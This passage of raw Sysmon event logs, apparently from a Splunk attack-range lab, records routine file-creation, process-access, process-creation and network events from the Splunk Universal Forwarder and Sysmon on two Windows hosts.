Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAA0656B2466395BF1D2206F88A01B9C,SHA256=6F2463B9F9751AD1A1C0532B7BA45BF51C3BCEA3F4D56AE37197911CE2D13FA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.161{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDA2BFE17388F5AEFB408D6F636BF543,SHA256=B4B8CFEB88CDCED4849730659F43801A8239E8F8ED3C3F62821F100033D47336,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.135{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B8A6791D42A370E64BE2D0EB696BFA2,SHA256=D22C511EF20858D6E71F71F5656E29AB7E62A2E24B7EB0D49FF56B27228586EE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.120{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.120{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17EF-629A-4742-000000005F02}5416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.120{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.120{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.120{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.120{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-17EF-629A-4742-000000005F02}5416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.120{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17EF-629A-4742-000000005F02}5416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.121{2E1864BB-17EF-629A-4742-000000005F02}5416C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.120{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6E21C2959758F8DC2660F80A7A348A12,SHA256=5244258403B29EF41EC7A19F893326A8E3C6B639F978CC2A797D1BC858A12AC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044094Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:19.968{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A197BA7831792FF81C1ED9146E1342,SHA256=AC6EF81CEE05F910CD6B3AE60D3BA91C94DD3A1804D01FA0CCEFDF2A6C51107E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044093Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:16.795{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52335-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000205201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:20.771{2E1864BB-17F0-629A-4942-000000005F02}33005576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:20.517{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17F0-629A-4942-000000005F02}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:20.517{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:20.517{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:20.517{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:20.517{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:20.517{2E1864BB-E13C-6299-0500-000000005F02}416780C:\Windows\system32\csrss.exe{2E1864BB-17F0-629A-4942-000000005F02}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:20.517{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-17F0-629A-4942-000000005F02}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:20.518{2E1864BB-17F0-629A-4942-000000005F02}3300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:20.501{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4946C87CCC9BE81D06E020F24A389A0,SHA256=EAF1BF236331BE1A3A2BE5FF0559C1338352CDA20A1C9225F94EC598C0BAAE11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:20.001{2E1864BB-17EF-629A-4842-000000005F02}73805088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044095Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:17:20.703{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=350C793C6A8D79B46D7E38941AEED1B0,SHA256=07FE9D1805D6F7123C30782B47CE434267FF26314123F0CEAEA00F19A4511962,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:21.614{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA99596603B79876C21324859A620CB4,SHA256=21A32AC08E4A0E883D04593064B007BC21ED0FB6D1CB19AABA8C12CC4D8A1DD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:21.527{2E1864BB-17F1-629A-4A42-000000005F02}48044836C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000205210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:19.695{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56362-false10.0.1.12-8000- 10341000x8000000000000000205209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:21.186{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-17F1-629A-4A42-000000005F02}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:21.186{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:21.186{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:17:21.186{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 